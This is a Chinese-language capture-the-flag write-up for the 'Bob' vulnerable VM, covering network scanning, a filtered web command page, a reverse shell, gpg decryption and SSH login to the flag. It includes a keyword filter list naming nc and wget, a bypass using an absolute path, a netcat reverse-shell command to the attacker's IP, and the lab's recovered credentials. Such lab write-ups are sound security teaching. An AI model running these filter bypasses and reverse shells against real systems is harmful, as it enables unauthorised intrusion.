Write-up-Bob_v1.0.1

关于

  1. 下载地址:点我

  2. 哔哩哔哩视频:哔哩哔哩

信息收集

  • 网卡:vmnet8;IP在192.168.131.1/24
1
2
3
4
5
6
7
➜  ~ ip a show dev vmnet8           
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
inet 192.168.131.1/24 brd 192.168.131.255 scope global vmnet8
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fec0:8/64 scope link
valid_lft forever preferred_lft forever
  • Nmap一顿扫;发现IP为192.168.131.139,再深入扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
➜  ~ nmap -sn 192.168.131.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-10 21:27 CST
Nmap scan report for 192.168.131.1
Host is up (0.00018s latency).
Nmap scan report for 192.168.131.139
Host is up (0.00078s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.49 seconds
➜ ~
➜ ~ nmap -T4 -A 192.168.131.139 -p1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-10 21:28 CST
Nmap scan report for 192.168.131.139
Host is up (0.0019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.65 seconds
➜ ~
  • 发现开放了80端口和服务为ssh的25468端口;还有robot.txt文件,里面有/login.php /dev_shell.php /lat_memo.html /passwords.html 把各个页面都看一遍发现有一个可以执行shell的页面。在lat_memo.html这个页面找到还有就得文件,可能是备份文件,在dev_shell.php后面加上bak,存在源码备份文件,下载回来获取过滤的规则。然后用脚绕。

GetFlag

  • dev_shell.php过滤了"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc",还有;,如果你用msf生成的Python反弹木马没有上面的关键字可以使用msf的。我生成的木马base64编码后刚刚好有NC这个关键词。所以我换了其他方法。在nc前面加上绝对路径。
1
/bin/nc -e /bin/sh 192.168.131.1 7788
  • 在本地用nc监听7788端口;nc -lvp 7788,然后执行命令。
  • 拿到Shell后转tty;python -c "import pty;pty,spawn('/bin/bash')";翻遍home目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[email protected]:/home/bob/Documents$ ls
ls
Secret login.txt.gpg staff.txt
[email protected]:/home/bob/Documents$ cat staff.txt
cat staff.txt
Seb:

Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him

James:

Does nothing
Pretty Lazy
Doesn't give a shit about his job

Elliot:

Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
[email protected]:/home/bob/Documents$

<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ gpg
gpg
gpg: Fatal: can't create directory '/var/www/.gnupg': Permission denied


[email protected]:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here
<ents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
ls
notes.sh
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
  • Google一顿找到这是一首藏头诗。每个大写字母开头组成一串HARPOCRATES,刚刚也看到了一个gpg文件,所以这可能是解密的密码。但在目标机上执行gpg发现没权限。就开启python -m SimpleHTTPServer把文件下载回来本地解密了。
1
2
3
4
➜  DOWNLOAD gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES 加密过的数据
gpg: 以 1 个密码加密
bob:b0bcat_
  • 因为bob就是服务器的管理员,所以可以用他的密码登录ssh。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
➜  DOWNLOAD ssh bob@192.168.131.139 -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/


[email protected]'s password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 8 23:49:12 2018 from 192.168.56.1
[email protected]:~$ sudo cat /flag.txt
sudo: unable to resolve host Milburg-High
[sudo] password for bob:
CONGRATS ON GAINING ROOT

.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t
[email protected]:~$